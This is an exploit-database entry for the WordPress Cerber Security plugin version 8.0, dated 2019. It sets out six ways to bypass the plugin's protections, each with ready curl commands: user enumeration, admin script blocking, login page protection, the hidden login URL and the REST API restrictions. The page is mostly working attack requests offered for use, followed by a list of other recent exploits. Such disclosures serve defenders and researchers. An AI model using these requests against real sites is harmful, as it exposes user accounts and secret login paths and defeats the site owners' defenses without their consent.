Wordpress plugin cerber security, antispam & malware scan 8.0 multiple bypass vulnerabilities Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-03-04 | Type : webapps | Platform : php


[+] Code ...

# Exploit Title: WordPress Cerber Security, Antispam & Malware Scan - Multiple Bypass Vulnerabilities
# Type: WordPress Plugin
# Date: 2019-03-04
# Active installs: 100,000+
# Version: 8.0
# Software Link: https://wordpress.org/plugins/wp-cerber/
# Exploit Author: ed0x21son
# Category: WebApps, WordPress
# Tested on: Linux/WordPress 5.1

[Vulnerabilities]


#1: Stop user enumeration bypass:

U can bypass user enumeration protection if u use Post method instead of Get.

curl http://localhost/ -d author=1



#2: Protect admin scripts bypass:

U can bypass admin scripts protection if u add one or more slashes to the uri.

curl 'http://localhost/wp-admin///load-scripts.php?load%5B%5D=jquery-core,jquery-migrate,utils'
curl 'http://localhost/wp-admin///load-styles.php?load%5B%5D=dashicons,admin-bar'



#3: Protects wp-login.php, wp-signup.php and wp-register.php from attacks bypass:

U can bypass this protection if u encode any character in the uri.

curl http://localhost/wp-login%2ephp
curl -v http://localhost/wp-signup%2ephp
curl -v http://localhost/wp-register%2ephp



#4: Hide login URL bypass:

U can bypass if u encode any character in the uri, Cerber will return the secret slug in the Location header field.

curl -I http://localhost/wp-%61dmin/



#5: Stop user enumeration via REST API bypass:

U can bypass if u insert /index.php/ between domain and rest route.

curl http:/localhost/index.php/wp-json/wp/v2/users/



#6: Disable REST API bypass:

Same above.

curl http:/localhost/index.php/wp-json/wp/v2/



--ed0x21son

Wordpress plugin cerber security, antispam & malware scan 8.0 multiple bypass vulnerabilities


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php

▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple

▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Wordpress plugin cerber security, antispam & malware scan 8.0 multiple bypass vulnerabilities Vulnerability / Exploit